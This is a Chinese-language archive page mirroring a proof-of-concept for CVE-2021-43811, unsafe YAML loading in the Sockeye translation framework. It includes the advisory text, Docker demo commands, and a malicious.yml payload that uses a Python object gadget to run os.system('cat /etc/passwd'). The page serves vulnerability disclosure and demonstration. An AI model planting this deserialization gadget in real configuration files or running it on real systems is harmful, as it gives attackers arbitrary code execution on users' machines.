关联漏洞
标题:Sockeye 代码注入漏洞 (CVE-2021-43811)Description:Sockeye是一个基于 PyTorch 的用于神经机器翻译的开源序列到序列框架。 Sockeye 存在代码注入漏洞,该漏洞源于Sockeye使用YAML在磁盘上存储模型和数据配置,Sockeye2.3.24以下的版本使用不安全的YAML加载,它可以执行嵌入在配置文件中的任意代码。攻击者可利用该漏洞可以将恶意代码添加到经过训练的模型的配置文件中,并试图说服用户下载并运行它。
Description
awslabs/sockeye Code injection via unsafe YAML loading CVE-2021-43811
介绍
# CVE-2021-43811
awslabs/sockeye Code injection via unsafe YAML loading CVE-2021-43811
## NVD Description
Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.
## Demo
## Set Up
1. Build an image from a Dockerfile
```
docker build -t cve-2021-43811 .
```
2. Run python main.py in a new container
```
docker run -it --rm cve-2021-43811
```
output /etc/passwd
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --
```
## PoC Payload
malicious.yml
```
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
```
## Reference
- https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
文件快照
[4.0K] /data/pocs/5a608ff880e6341f455144da2e8437b6ce9e5ff2
├── [ 120] Dockerfile
├── [1.0K] LICENSE
├── [ 73] main.py
├── [ 144] malicious.yml
└── [1.4K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。